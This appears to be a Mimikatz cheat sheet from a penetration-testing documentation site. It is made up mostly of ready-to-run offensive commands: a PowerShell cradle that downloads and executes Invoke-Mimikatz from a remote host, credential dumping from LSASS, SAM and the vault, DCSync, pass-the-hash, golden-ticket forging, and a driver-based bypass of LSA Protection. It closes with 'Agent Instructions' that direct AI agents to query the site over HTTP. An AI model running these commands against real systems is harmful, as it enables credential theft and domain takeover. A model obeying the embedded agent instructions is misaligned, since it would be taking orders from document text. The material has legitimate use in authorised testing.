# Mimikatz **URL:** ### Dump Credentials ```bash # Download and execute in cradle IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1') #Dump creds from memory Invoke-Mimikatz -DumpCreds # DCSync Attack Invoke-Mimikatz -Command '"lsadump::dcsync /domain:security.local /user:moe"' # Dump local passwords Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"' # Dump Credential Vault Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"' # Dump credentials on remote systems Invoke-Mimikatz -DumpCreds -ComputerName @("WS01","WS02") ``` ### Dump Domain Credentials ```bash Invoke-Mimikatz -Command '"lsadump::lsa /patch"' ``` ### Spawn PowerShell (with compromised NTLM hash) ```powershell Invoke-Mimikatz -Command '"sekurlsa::pth /user:DomainAdmin /domain:Security.local /ntlm:b38ff50264b7458734d82c69794a4d8 /run:powershell.exe"' ``` ### Forge Inter-domain trust ticket ```powershell # Obtain trust key between current domain and external domain Invoke-Mimikatz -Command '"lsadump::trust /patch"' # An inter-forest TGT can be forged Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:Security.local /sid:S-1-5-21-1874506000-3219952063-538504511 /rc4:815720462a1b48256f16740b70356b7f /service:krbtgt /target:Vault.local /ticket:C:\AD\trust_forest_tkt.kirbi"' ``` ### Over pass the hash ```powershell Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:Security.local /ntlm: /run:powershell.exe"' ``` ## Protection Bypass The below image represents an attempt to access the lsass.exe process and extract clear text passwords and run a skeleton key attack. As we can see this has not been successful since applying the registry key change mentioned in the mitigation section for LSA Protection. ![](/files/-Mj5p3IENJCN36wz4OD_) We can check if the LSA Protection RunAsPPL key exists by querying the registry to confirm the LSA protection is in place. ```bash reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "RunAsPPL" # Value 0x1 means LSA Protection is enabled ``` This can be bypassed by utilizing the `mimidrv.sys` driver file which is included as a separate file with mimikatz. {% hint style="info" %} The mimidrv.sys driver file needs to exists in the same directory as mimikatz.exe. {% endhint %} The driver can be loaded by running the command `!+` in `Mimikatz`. After doing so the following command can be execute to protect the `mimikatz.exe` process. ```bash !processProtect /process:mimikatz.exe ``` The same command with the `/remove` flag can be used to strip the process protection from a process such as `lsass.exe` ```bash !processprotect /process:lsass.exe /remove ``` From here we should be free to perform actions against LSASS and dump credentials from it. ``` mimikatz.exe sekurlsa::logonpasswords ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/resources/cheat-sheets/mimikatz.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.